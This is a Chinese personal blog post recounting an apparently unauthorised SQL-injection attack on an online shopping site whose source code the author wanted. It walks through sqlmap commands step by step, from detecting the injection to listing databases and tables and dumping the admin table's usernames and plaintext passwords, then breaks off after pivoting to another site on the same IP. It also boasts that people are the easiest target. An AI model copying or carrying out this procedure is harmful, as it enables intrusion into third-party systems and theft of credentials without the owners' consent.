Welcome to

nervous从你的全世界路过

Home / 干货分享 / 记一次心酸的渗透

记一次心酸的渗透

若因文章引起身体不适,请尽快关闭文章页面,打开藿香正气液,猛吸一口
人总是最佳突破口,绝大多数人都不难黑
只要你倾听他们、观察他们
人的漏洞就像钉在头顶的霓虹灯一样

——————————-淫荡的分割线—————————————

咳咳咳,步入正题,大概是这样。

不打码真的好吗?

看到这个网站,给我冒出一个想法,我也想要一套公众号在线商城源码。嗯就这样。就随便浏览了下网页,

哎哟发现个好玩的。貌似这个地方有的爆菊,你给我看你的二维码就不好了。心痛

and大发开始 1=1  1=999

掏出上古神器sqlmap

这个站大概php+mysql

开放端口80,21

sqlmap.py  -u “url” 检测是否存在注入,类型为get,开始下一步获取网站数据库

sqlmap.py -u “url” –dbs

继续爆菊。查看正在使用在数据库中的table

sqlmap.py -u “url” -D  admin123 –tables

还可以,31个表,继续爆菊admin

sqlmap.py -u “url” -D  -T admin –tables

e嗯好了,下面就直接爆出admin表中字段了

sqlmap.py -u “url” -D  -T admin –columns

可以看到表中有password,useradname。嗯 基本上就是网站后台账号密码了

继续深入

sqlmap.py -u “url” -D  -T admin -C “id,password,username” –dump

哎哟,密码未加密?心中有点慌。

去猜解了下网站后台,哇你这后台也太丑了。算了试试看吧。

恶心的地方到了,貌似账号密码不对,于是重新去跑了几个表,都未成功。令人窒息的操作。

冷静抽根烟,杀个回马枪,嗯IP解析了两个站,撸过去

此处省略。。。。

ps:大概就到这里吧。此文章没什么技术含量。大佬勿喷

 

发表评论

nervous从你的全世界路过